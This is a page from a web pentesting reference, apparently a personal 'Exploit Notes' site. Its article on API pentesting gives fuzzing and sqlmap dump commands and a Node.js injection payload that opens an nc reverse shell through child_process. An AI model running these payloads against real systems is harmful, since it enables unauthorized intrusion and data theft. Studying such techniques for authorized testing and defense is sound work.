Exploit Notes
Exploit Notes

Exploits related to Web

Method

HTTP Rate Limit Bypass
Virtual Hosts (VHOSTS) Enumeration
WAF (Web Application Firewall) Detection
Web Basic Pentesting
Web Content Discovery
Web Login Bypass

Security Risk

Blind XXE
Broken Access Control
Business Logic Attack
CORS (Cross-Origin Resource Sharing) Attack
CRLF (Carriage Return Line Feed) Injection
CSRF (Cross-Site Request Forgery)
Cookie Hijacking
Directory (Path) Traversal
File Inclusion
File Upload Attack
HTTP Request Smuggling
IDOR (Insecure Direct Object References) Attack
Insecure Deserialization
JSON.NET Deserialization
NoSQL Injection
Node.js Deserialization Attack
OAuth Attack
OS Command Injection
Open Redirect
PHP Object Injection
Redis SSRF
SQL Injection Cheat Sheet
SQL Injection with Sqlmap
SSRF (Server-Side Request Forgery)
SSTI (Server-Side Template Injection)
XSS (Cross-Site Scripting)
XSS with Dynamic PDF
XST (Cross-Site Tracing)
XXE (XML External Entity)

CMS

Bolt CMS Pentesting
CMS (Content Management System) Pentesting
Cockpit CMS Pentesting
Concrete CMS Pentesting
FUEL CMS Pentesting
Joomla CMS Pentesting
Mara CMS Pentesting
Subrion CMS Pentesting
TYPO3 Pentesting
WordPress Pentesting

Framework

AJP (Apache JServ Protocol) Pentesting
Angular Pentesting
Apache Struts Pentesting
Django Pentesting
Flask Jinja2 Pentesting
Python Pickle RCE
Spring Cloud Function RCE
Spring Pentesting
Werkzeug Pentesting

Template Engine

JsRender Template Injection
Pug Pentesting

API

API Pentesting
GraphQL Pentesting

Cloud

AWS (Amazon Web Services) Pentesting
Spring Cloud Function RCE

Tool

How to Use Burp Suite
How to Use OWASP ZAP

Others

Apache ActiveMQ Pentesting
Apache Tomcat Pentesting
Atlassian Confluence Pentesting
Browser in the Browser (BITB) Attack
ClipBucket Pentesting
Code Deobfuscation
Codiad Pentesting
Dompdf RCE
Dump Git Repository from Website
Grafana Pentesting
HashiCorp Consul Pentesting
JBOSS Pentesting
JWT (Json Web Token) Pentesting
Jenkins Pentesting
Log4j Pentesting
OpenCATS Pentesting
PHP Srand Time Abusing
Restaurant Management System (RMS) Pentesting
TeamCity Pentesting
Tiny File Manager Pentesting
Web Browser Settings for Pentesting
Web PHP Pentesting
WebAnno Pentesting
WebDAV Pentesting
WebSocket Pentesting
Webmin Pentesting

API Pentesting

Last modified: 2023-03-12

Web

Application Programming Interface (API) is for communicating with each computer. There are several types such as Web API, REST API, RESTful API.

Change Methods

# Methods
GET, POST, PUT, DELETE, OPTIONS, HEAD, PATCH, INVENTED

Endpoint Discovery

/api/?xml
# Web Service Description Language
/api/?wsdl
# Versions
/api/v1/user
/api/v2/user
# Wildcards
/api/v2/user/posts/*
/api/v2/users/*
# Path traversal
/api/v1/post/..\private

Automation

# Dirb
dirb https://vulnerable.com/ endpoints.txt

# Ffuf
ffuf -u https://vulnerable.com/FUZZ -w endpoints.txt
ffuf -u https://vulnerable.com/FUZZ -X POST -w endpoints.txt
ffuf -u https://vulnerable.com/api/FUZZ -w wordlist.txt
ffuf -u https://example.com/api/?FUZZ=test -w wordlist.txt

# Gobuster
gobuster dir -u https://vulnerable.com/ -w endpoints.txt

# Kiterunner
# -A: wordlist type (ex. first 20000 words)
# -x: max connection per host (default: 3)
kr scan https://vulnerable.com/api -A=apiroutes-210228:20000 -x 10
kr scan https://vulnerable.com/api -A=apiroutes-210228:20000 -x 10 --fail-status-codes 401,404
kr scan https://vulnerable.com:8443/api -A=apiroutes-210228:20000 -x 10

This wordlist is useful for endpoints.


GET Parameters

/api/v1/user?id=test
/api/v1/user?name=test
/api/v1/user?uuid=test
/api/v1/status?live=test
/api/v1/status?verbose=test

Parameter Fuzzing

# Key
ffuf -u https://vulnerable.com/api/items?FUZZ=test -w wordlist.txt
ffuf -u https://vulnerable.com/api/items?FUZZ=test -w wordlist.txt -fs 120
ffuf -X POST -u https://vulnerable.com/api/items?FUZZ=test -w wordlist.txt
ffuf -X POST -u https://vulnerable.com/api/items?FUZZ=test -w wordlist.txt -fs 120

# Value
ffuf -u https://vulenrable.com/api/items?test=FUZZ -w wordlist.xt
ffuf -u https://vulnerable.com/api/items?test=FUZZ -w wordlist.txt -fs 120
ffuf -X POST -u https://vulnerable.com/api/items?test=FUZZ -w wordlist.txt
ffuf -X POST -u https://vulnerable.com/api/items?test=FUZZ -w wordlist.txt -fs 120

XSS

If we can send post (or put) requests to API endpoints, we may be able to insert payloads and the result will be reflected as the output.
XSS can be used for this exploitation.


SQL Injection

sqlmap -u http://vulnerable.com/api/v2/fetch/?post=1 --dump --batch

Node.js Remote Code Execution (RCE)

If the website uses the Node (e.g. Express), we may be able to execute the JavaScript function.

# Get current working directory in the website
/api/?key=process.cwd()

Reverse Shell

We may be able to execute reverse shell using "child_process".
First off, start listener for getting a shell in local machine.

nc -lvnp 4444

Then send request to the website with the parameter which executes reverse shell using child_process.

/api/?key=require('child_process').exec('rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <local-ip> 4444 >/tmp/f')

We should see that we get a shell in local terminal.


Same Session Across Multiple Versions and Instances

For example, assumed the website has two endpoints such as "/api/v1/user/login", "/api/v2/user/login".
"v1" uses "X-Token" and "v2" uses "X-Session".
After login to "v1", you may be able to get access "v2" using the session key/value of "v1".

X-Token: fc38ab5f5ae41072778d852023f9ee26
X-Session: fc38ab5f5ae41072778d852023f9ee26

XXE

GET /api/product/1?xml HTTP/1.1

If the website displays the response in XML, we might be able to XXE.

References

Twitter GitHub

Tools by HDKS

Fuzzagotchi

Automatic web fuzzer.

aut0rec0n

Auto reconnaissance CLI.

Hash Cracker

Hash identifier.